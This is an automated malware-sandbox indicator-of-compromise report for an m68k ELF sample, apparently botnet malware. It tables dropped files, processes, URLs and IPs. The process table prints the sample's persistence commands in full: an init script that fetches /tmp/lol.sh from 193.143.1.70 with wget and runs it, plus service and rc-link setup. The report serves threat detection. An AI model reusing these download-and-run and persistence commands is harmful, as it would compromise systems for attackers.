IOC Report
m68k.nn.elf

Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| m68k.nn.elf | ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped | initial sample | malicious |
| /etc/init.d/m68k.nn.elf | POSIX shell script, ASCII text executable | dropped | malicious |
| /etc/init.d/system | POSIX shell script, ASCII text executable | dropped | malicious |
| /etc/profile | ASCII text | dropped | malicious |
| /etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious |
| /boot/bootcmd | ASCII text | dropped | |
| /etc/inittab | ASCII text | dropped | |
| /etc/motd | ASCII text | dropped | |
| /etc/systemd/system/custom.service | ASCII text | dropped | |
| /memfd:snapd-env-generator (deleted) | ASCII text | dropped | |
| /tmp/qemu-open.NgO5at (deleted) | ASCII text, with no line terminators | dropped | |

Processes

| Path | Cmdline | Malicious |
|---|---|---|
| /tmp/m68k.nn.elf | /tmp/m68k.nn.elf | |
| /tmp/m68k.nn.elf | - | |
| /tmp/m68k.nn.elf | - | |
| /bin/sh | sh -c "systemctl enable custom.service >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/systemctl | systemctl enable custom.service | |
| /tmp/m68k.nn.elf | - | |
| /bin/sh | sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/chmod | chmod +x /etc/init.d/system | |
| /tmp/m68k.nn.elf | - | |
| /bin/sh | sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/ln | ln -s /etc/init.d/system /etc/rcS.d/S99system | |
| /tmp/m68k.nn.elf | - | |
| /bin/sh | sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf" | |
| /tmp/m68k.nn.elf | - | |
| /bin/sh | sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/chmod | chmod +x /etc/init.d/m68k.nn.elf | |
| /tmp/m68k.nn.elf | - | |
| /bin/sh | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/mkdir | mkdir -p /etc/rc.d | |
| /tmp/m68k.nn.elf | - | |
| /bin/sh | sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/ln | ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf | |
| /tmp/m68k.nn.elf | - | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | |
| /usr/libexec/gnome-session-binary | - | |
| /bin/sh | /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping | |
| /usr/libexec/gsd-housekeeping | /usr/libexec/gsd-housekeeping | |
| /usr/lib/systemd/systemd | - | |
| /usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator | |
| /usr/sbin/gdm3 | - | |
| /etc/gdm3/PrimeOff/Default | /etc/gdm3/PrimeOff/Default | |
| /usr/sbin/gdm3 | - | |
| /etc/gdm3/PrimeOff/Default | /etc/gdm3/PrimeOff/Default | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | |
| /usr/lib/systemd/systemd | - | |
| /lib/systemd/systemd-user-runtime-dir | /lib/systemd/systemd-user-runtime-dir stop 127 | |

40 further processes are hidden in the original report.

URLs

| Name | IP | Malicious |
|---|---|---|
| http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi | unknown | |
| http://193.143.1.70/curl.sh | unknown | |
| http://193.143.1.70/lol.sh | unknown | |
| http://193.143.1.70/ | unknown | |

Domains

| Name | IP | Malicious |
|---|---|---|
| daisy.ubuntu.com | 162.213.35.25 | |

IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 154.216.19.139 | unknown | Seychelles | |

Memdumps

| Base Address | Regiontype | Protect | Malicious |
|---|---|---|---|